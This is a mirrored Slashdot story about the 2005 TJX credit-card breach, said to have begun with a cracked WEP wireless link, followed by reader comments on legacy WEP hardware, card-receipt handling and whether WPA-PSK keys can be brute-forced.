Slashdot Mirror

← Back to Stories (view on slashdot.org)

TJX Breach Began With WEP Crack

Posted by kdawson on from the pwn3d-by-Pringles dept.

An anonymous reader sends us to the Wall Street Journal for a detailed report on what is known to date about the TJX data breach. It seems that the loss of over 45 million credit card numbers and more than 450,000 SSNs, driver's license numbers, and military identifications began with someone using a "telescope-shaped" antenna at a wireless link at a Marshall's near St. Paul, Minnesota in July 2005. The link was encrypted using WEP, which had been known to be broken since 2001. The crackers who got into the TJX central databases are believed to be Romanians or Russians with ties to the Russian mobs. The eventual cost of the TXJ fiasco could exceed $1 billion — not including the numerous lawsuits filed against the retailer.

7 of 164 comments (clear)

  1. Re:Ok? by pchan- · · Score: 4, Informative

    TJX - commonly known to American consumers as TJ Max and Marshalls retail stores. If you made purchases at these stores, you could be affected.

  2. Re:Why isn't WEP recalled? by arth1 · · Score: 4, Informative

    There's plenty of older hardware that doesn't have the processing power to do WPA, and has to rely on WEP. This is especially true for embedded devices (like print servers and bar code scanners) and PDAs. And for larger companies, replacing every single access point AND WiFi-device isn't a small thing.
    Could you imagine being the IT manager who has to tell upper management that the big expense you added to the budget two years ago, which was supposed to last five years before being incrementally replaced, now has to be completely trashed and replaced in one go because the encryption turned out to not be safe?

    The best thing many companies can do short term is to limit the damage, by restricting the use of WEP to data that they can afford losing. But even that requires admitting flaws, and is likely to get your head chopped off for bringing the bad news.

  3. Re:Ironic by Anonymous Coward · · Score: 1, Informative

    It wasn't that sensitive info was going over WEP, it's that getting in through WEP allowed them to install a sniffer on wired router. The weakness of WEP is only the first link in an insecure chain. No servers were compromised because none needed to be.

  4. Re:Can someone explain to me by C_L_Lk · · Score: 2, Informative

    I run a small business and this is exactly how the credit card transactions take place. A customer comes in to the store and purchases something and wishes to use their credit card - the card is swiped through a terminal that uses a dial-up modem connection back to the bank's clearing house - a conversation takes place between the terminal and the remote server (at a mighty 9600bps) - and either a "approved" or "declined" is returned and a *PAPER* receipt (2 part) is thermally printed. The customer gets one copy of that and one copy of the register receipt. I keep one copy of the register receipt for proof of what they purchased, along with the signed copy of their purchase. The credit card companies (Visa/MC/Am Ex) all require I keep those paper records for 1 year in case of charge backs, etc. Each evening when the business closes the paper receipts are collected and put in a manilla envelope marked with the day's date and the envelope is placed in a locked filing cabinet in the back office. At the beginning of each month, credit card purchase receipts more than 1 year past are burned in the incinerator - the filing cabinet never has more than 12 past months data, and none if it is stored in electronic format anywhere on premise. The point of sale software's database has a record of all transactions ever taken place as far as inventory, amount paid, taxes collected - but it has nothing that can tie the purchase to a customer or that customer's financial information. I don't see why any size business of any type couldn't follow that method of doing business.

  5. Re:Why isn't WEP recalled? by chihowa · · Score: 2, Informative
    So you're either referring to this dictionary attack or you're just making stuff up. All of the reported WPA cracks are for WPA-PSK and are brute force cracks. I don't see why you'd need modified firmware to do a brute force attack (although I guess you could make it faster that way, but ideally you'd do the attack on captured traffic, so it wouldn't make a difference). If you're instead referring to some super secret uberleet method to take advantage of a flaw in the crypto of WPA (like the weak IV's or small keyspace of WEP) then out with it! Pretending like you've solved a very difficult problem but refuse to tell people how you did it screams of you making it all up.

    And a brute force attack isn't a real crack, either. Quoting MechaBlue on this site:

    WPA-PSK may be vulnerable to a brute force attack but, with the choice of the right password, it becomes unfeasible. Assuming a decent utility is used, a 31 character long password of random upper- and lowercase letters and numbers results in 62^31, or 3.7x10^55 possible combinations. If we assume 60 attempts per second, it will take more that 1.3x10^36 times the age of the universe (15 billion years) to attempt every possible combination. The average time would be half that, or 6.5x10^35 times the age of the universe. Even if someone were to come up with a scheme that reduced the bruteforce time to 1 trillionth of what would be required otherwise, it would still take 6.5x10^23 times the age of the universe. And so on... Unless someone find another way to get the password (e.g., can determine from traffic (like with WEP), beats it out of me, hacks my laptop, etc.), my WAP will remain secure until long after I'm dead. And that's good enough for me.

    Thinking about it, though, I'd bet you could pick up traces of the unencrypted datastream in poorly designed cards. That's hardly a crack for the crypto, though.

    --
    If you want a vision of the future, imagine a youtube comments section scrolling - forever.
  6. Re:Ironic by Klinky · · Score: 2, Informative

    You may be surprised at how many customers whine at any inconvenience, even for their own good. Start questioning Bob Smith about his card and he's going to get huffy at the inconvenience of having to pull out some photo ID or answer some security questions or get upset over the "accusation" of being a thief. "Well, I am Bob Smith, I know who I am.". Yeah, OK. I do customer service over the phone. We require the last 4 of the CC# we have on file to verify people calling in are who they are. We let people know that we'll need the last 4 numbers while they're listening to the hold music. But I still get numerous customers who don't have it ready & then get upset that they really are going to have to get their wallet out & read those last 4 digits off as hard as that is to do. Also it's not only a consumer issue. While there is a data mine to be had with insecure commercial operations, there's quite a bit that can be had at insecure or stupid personal locations. A person can have their ID stolen from their own insecure network connection, or from not logging out of their MySpace account on a public computer. Also plain old non technological ways as well, such as throwing bank statements or sensitive info into a garbage bin w/o shredding it. So no, it's not just about "lazy corporate fuckwits".

  7. Re:Why isn't WEP recalled? by bentcd · · Score: 2, Informative

    cracking WPA requires only the 4 way handshake and the use of a decent dictionary or brute force attack
    You seem to have left something out: Cracking WPA also requires that the administrator decided to use a weak key, i.e. one that is susceptible to brute force or dictionary attacks. But if you are allowed to assume this, then any encryption is "easily" cracked. Even OTP is trivially cracked if the key sequence is easy to guess.

    --
    sigs are hazardous to your health